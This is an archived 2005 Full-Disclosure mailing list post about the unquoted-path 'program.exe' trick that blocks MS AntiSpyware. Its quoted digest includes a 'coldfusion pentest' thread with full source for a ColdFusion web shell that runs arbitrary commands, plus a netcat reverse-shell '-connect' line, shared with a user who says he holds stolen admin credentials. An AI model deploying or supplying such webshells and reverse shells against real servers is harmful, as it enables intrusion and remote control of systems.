Full Disclosure mailing list archives

RE: Useless tidbit (MS AntiSpyware)

From: Steven Rakick <stevenrakick () yahoo com>
Date: Tue, 10 May 2005 07:30:03 -0700 (PDT)


Interesting. Has this always been that way? While it's not a huge gaping hole, it's definitely concerning. At least to 
me.

Steve

 

-----Original Message-----

From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of 
pretty vacant

Sent: Tuesday, May 10, 2005 9:53 AM

To: James Tucker

Cc: full-disclosure () lists grok org uk

Subject: Re: [Full-disclosure] Useless tidbit

You may or may not know that Windows applications often use the registry to store information about where to find 
applications within their file system. Due to the way in which Windows handles filenames, situations where this 
information is stored in an unquoted fashion, can leave the application open to an attack commonly referred to as the 
"Program.exe trick".

As you know, it's quite common to have files and/or directories with spaces in the name (e.g. C:\Program Files). 
Windows is unique in that it essentially doesn't exactly know what it's doing if the command isn't quoted and contains 
spaces. For example look at the following command:

c:\program files\windows media player\wmplayer

If unquoted, Windows tries the following:

1st try

Execute: c:\program.exe

Arg1: files\windows

Arg2: media

Arg3: player\wmplayer

2nd try

Execute: "c:\program files\windows.exe"

Arg1: media

Arg2: player\wmplayer

3rd try

Execute: "c:\program files\windows media"

Arg1: player\wmplayer

4th try

Execute: "c:\program files\windows media player\mwplayer.exe"

Well in the case of MS AntiSpyware (and hundreds of other applications), AntiSpyware, it starts up by executing 
"AntiSpywareMain.exe" which in turn displays a nice splash screen, performs some other misc activities before calling 
the gsasDtServ.exe. The problem is that the execution of gsasDtServ.exe is unquoted, while the app tries to execute 
c:\program files\microsoft antispyware\gsasDtServ.exe, if c:\program.exe exists, it will be executed instead and MS 
Antispyware never actually gets loaded.

With XPSP2, the OS will actually warn you about files like c:\Program.bat, or c:\Program.exe, but not of c:\program 
files\internet.exe.

Sadly, this isn't uncommon and when I tested this on my system the first time, 7 applications were executed over a 48 
hour period. Try it for yourself. My Program.exe logs the executing user and command args to c:\program.log.

 

 

On Tue, 10 May 2005, James Tucker wrote:

It appears this was a "trick" that I missed, can you provide more info?

thanks.

On 5/9/05, pretty vacant <optimist () eurocompton net> wrote:

Interesting tidbit. The old c:\program.exe trick prevents MS

Anti-Spyware from loading at login. :)

_______________________________________________

Full-Disclosure - We believe in it.

Charter: http://lists.grok.org.uk/full-disclosure-charter.html

Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________

Full-Disclosure - We believe in it.

Charter: http://lists.grok.org.uk/full-disclosure-charter.html

Hosted and sponsored by Secunia - http://secunia.com/


full-disclosure-request () lists grok org uk wrote:Send Full-Disclosure mailing list submissions to
full-disclosure () lists grok org uk

To subscribe or unsubscribe via the World Wide Web, visit
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request () lists grok org uk

You can reach the person managing the list at
full-disclosure-owner () lists grok org uk

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."


Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.


Today's Topics:

1. List Charter (John Cartwright)
2. Re: Fwd: GWAVA Sender Notification (Content filter) (James Tucker)
3. Re: coldfusion pentest (fatb)
4. Re: coldfusion pentest (fatb)


----------------------------------------------------------------------

Message: 1
Date: Tue, 10 May 2005 10:02:23 +0100
From: John Cartwright 
Subject: [Full-disclosure] List Charter
To: full-disclosure () lists grok org uk
Message-ID: <20050510090223.GA21817 () grok org uk>
Content-Type: text/plain; charset=us-ascii

Hi

FYI: I have disabled monthly password reminders due to the increasing
problem of archive sites storing them verbatim without filtering. 
Anyone running such an archive is encouraged to change their password
if necessary.

A password reminder is always available via the web interface in any
case. Additionally I have moved to more secure random passwords for
new members.

Cheers
- John

[Full-Disclosure] Mailing List Charter
John Cartwright 


- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing 
list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily 
concerned with security issues and their discussion. The list is 
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.


- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface 
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to 
full-disclosure-request () lists grok org uk, send the word 'help' in 
either the message subject or body for details.


- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to 
accept submissions from non-members based on individual merit and 
relevance.

It is expected that the list will be largely self-policing, however in
special circumstances (eg spamming, misappropriation) then offending 
members may be removed from the list by the management.

An archive of postings is available at 
http://lists.grok.org.uk/pipermail/full-disclosure/.


- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for 
instance announcement and discussion thereof, exploit techniques and 
code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is 
forbidden. Disagreements, flames, arguments, and off-topic discussion 
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. 
Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they 
should use discretion in executing any tools or code distributed via
this list.


- Posting Guidelines -

The primary language of this list is English. Members are expected to 
maintain a reasonable standard of netiquette when posting to the list. 

Quoting should not exceed that which is necessary to convey context, 
this is especially relevant to members subscribed to the digested 
version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will 
preferably be short and to the point, and those containing 
'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or 
S/MIME signatures, proof-of-concept code, etc) but must not be active 
(in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to 
list postings. Offenders will be excluded from the mailing list until 
the problem is corrected.

Members may post to the list by emailing 
full-disclosure () lists grok org uk. Do not send subscription/
unsubscription mails to this address, use the -request address 
mentioned above.


- Charter Additions/Changes -

The list charter will be published at 
http://lists.grok.org.uk/full-disclosure-charter.html.

In addition, the charter will be posted monthly to the list by the 
management.

Alterations will be made after consultation with list members and a 
concensus has been reached.


------------------------------

Message: 2
Date: Tue, 10 May 2005 10:11:56 +0100
From: James Tucker 
Subject: Re: [Full-disclosure] Fwd: GWAVA Sender Notification (Content
filter)
To: "Valdis.Kletnieks () vt edu" 
Cc: full-disclosure () lists grok org uk
Message-ID: 
Content-Type: text/plain; charset=ISO-8859-1

marketing is a "wonderful" thing.

On 5/10/05, Valdis.Kletnieks () vt edu wrote:

On Tue, 10 May 2005 02:32:41 BST, James Tucker said:

Surely this kind of message is a really bad idea.


You know it, I know it, and the A/V vendors know it.

What is the possible true business value of such a filter?


The true business value is for the A/V vendor, who can blat out a
free spam to the forged MAIL FROM: address (which is probably scraped off
a disk by the worm/virus and therefor likely an actual address.

In this case, the bozos at GWAVA can spam you about finding something they
didn't consider acceptable.

What is the potential impact upon security to disclose the information
that this mail does?


It demonstrates that the site running it is lame enough to still be running
A/V software that spams people.

What is the cost of deployment of this system against the costs
related to it's potential, and actual effects?


The GWAVA people don't care. They've been paid for the product already, and
they're not the ones paying for the bandwidth.

Remember - you're talking here about a market segment *founded* on the business
model that *partially* patching some other vendor's broken software will lead
to a permanent gravy train. Once you've wrapped your brain around the morals
and ethics of that business model, it's obviously a very tiny step to spamming
other people about the wonders of the product.



------------------------------

Message: 3
Date: Tue, 10 May 2005 17:12:00 +0800
From: "fatb" 
Subject: Re: [Full-disclosure] coldfusion pentest
To: "Javier Reoyo" 
Cc: full-disclosure () lists grok org uk
Message-ID: <007001c55540$cdd9d440$3801a8c0@bill>
Content-Type: text/plain; charset="gb2312"

thx :)

the script from securiteam was from Kurt Grutzmacher originally,it could not run in my box

and Im successful got a working shell by uploading a nc like tool and use the following script to run it



arguments="-connect 1.1.1. 9999"
timeout="20">




no matter how,I thought many guys who like me need a working cf webshell,because the upload script do not allow us to 
upload exe or some other kinds of files



----- Original Message ----- 
From: "Javier Reoyo" 
To: 
Sent: Tuesday, May 10, 2005 4:31 PM
Subject: Re: [Full-disclosure] coldfusion pentest

Hi fatb,


this is from mailing of securiteam. Try it.

ColdFusion Web Shell
------------------------------------------------------------------------


SUMMARY



DETAILS

The following source code will generate a web based shell whenever it is
executed under the ColdFusion environment.

Tool source code:
< html>
< body>

< cfoutput>
< table>
< form method="POST" action="cfexec.cfm">
< tr>
< td>Command:
< td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")>
value="#form.cmd#" > < br>

< tr>
< td>Options:
< td> < input type=text name="opts" size=50 < cfif
isdefined("form.opts")> value="#form.opts#" >< br> 

< tr>
< td>Timeout:
< td>< input type=text name="timeout" size=4 < cfif
isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"



< input type=submit value="Exec" >


< cfsavecontent variable="myVar">
< cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
"#Form.timeout#">


< pre>
#myVar#






ADDITIONAL INFORMATION

The information has been provided by Kurt
Grutzmacher.



========================================

----- Original Message ----- 
From: "fatb" 
To:

Cc: 
Sent: Tuesday, May 10, 2005 4:43 AM
Subject: [Full-disclosure] coldfusion pentest

Hi all guys

I've successed get the admin's passwd of the web interface

and I can upload any kinds of files to the server

the server is running coldfusion 4.5 with iis 5.0

but I can not find a coldfusion webshell to continue

anybody could be kind enough to send me a working coldfusion webshell

thx in advanced!



----------------------------------------------------------------------------
----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


------------------------------

Message: 4
Date: Tue, 10 May 2005 17:19:59 +0800
From: "fatb" 
Subject: Re: [Full-disclosure] coldfusion pentest
To: "Javier Reoyo" 
Cc: full-disclosure () lists grok org uk
Message-ID: <007901c55541$7e11ad10$3801a8c0@bill>
Content-Type: text/plain; charset="gb2312"

thx :)

the script from securiteam was from Kurt Grutzmacher originally,it could not run in my box

and Im successful got a working shell by uploading a nc like tool and use the following script to run it



arguments="-connect 1.1.1. 9999"
timeout="20">




no matter how,I thought many guys who like me need a working cf webshell,because the upload script do not allow us to 
upload exe or some other kinds of files



----- Original Message ----- 
From: "Javier Reoyo" 
To: 
Sent: Tuesday, May 10, 2005 4:31 PM
Subject: Re: [Full-disclosure] coldfusion pentest

Hi fatb,


this is from mailing of securiteam. Try it.

ColdFusion Web Shell
------------------------------------------------------------------------


SUMMARY



DETAILS

The following source code will generate a web based shell whenever it is
executed under the ColdFusion environment.

Tool source code:
< html>
< body>

< cfoutput>
< table>
< form method="POST" action="cfexec.cfm">
< tr>
< td>Command:
< td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")>
value="#form.cmd#" > < br>

< tr>
< td>Options:
< td> < input type=text name="opts" size=50 < cfif
isdefined("form.opts")> value="#form.opts#" >< br> 

< tr>
< td>Timeout:
< td>< input type=text name="timeout" size=4 < cfif
isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"



< input type=submit value="Exec" >


< cfsavecontent variable="myVar">
< cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
"#Form.timeout#">


< pre>
#myVar#






ADDITIONAL INFORMATION

The information has been provided by Kurt
Grutzmacher.



========================================

----- Original Message ----- 
From: "fatb" 
To:

Cc: 
Sent: Tuesday, May 10, 2005 4:43 AM
Subject: [Full-disclosure] coldfusion pentest

Hi all guys

I've successed get the admin's passwd of the web interface

and I can upload any kinds of files to the server

the server is running coldfusion 4.5 with iis 5.0

but I can not find a coldfusion webshell to continue

anybody could be kind enough to send me a working coldfusion webshell

thx in advanced!



----------------------------------------------------------------------------
----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

End of Full-Disclosure Digest, Vol 3, Issue 18
**********************************************


                
---------------------------------
Discover Yahoo!
 Use Yahoo! to plan a weekend, have fun online & more.  Check it out!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

RE: Useless tidbit (MS AntiSpyware) Steven Rakick (May 10)
- RE: Useless tidbit (MS AntiSpyware) Nick FitzGerald (May 10)
  - Re: Useless tidbit (MS AntiSpyware) James Tucker (May 10)
  - RE: Useless tidbit (MS AntiSpyware) Randall M (May 11)
    - Re: Useless tidbit (MS AntiSpyware) byte busters (May 11)
    - Re: Useless tidbit (MS AntiSpyware) Kurt Buff (May 11)
    - Re: Useless tidbit (MS AntiSpyware) Valdis . Kletnieks (May 11)
- <Possible follow-ups>
- Re: Useless tidbit (MS AntiSpyware) Des Ward (May 12)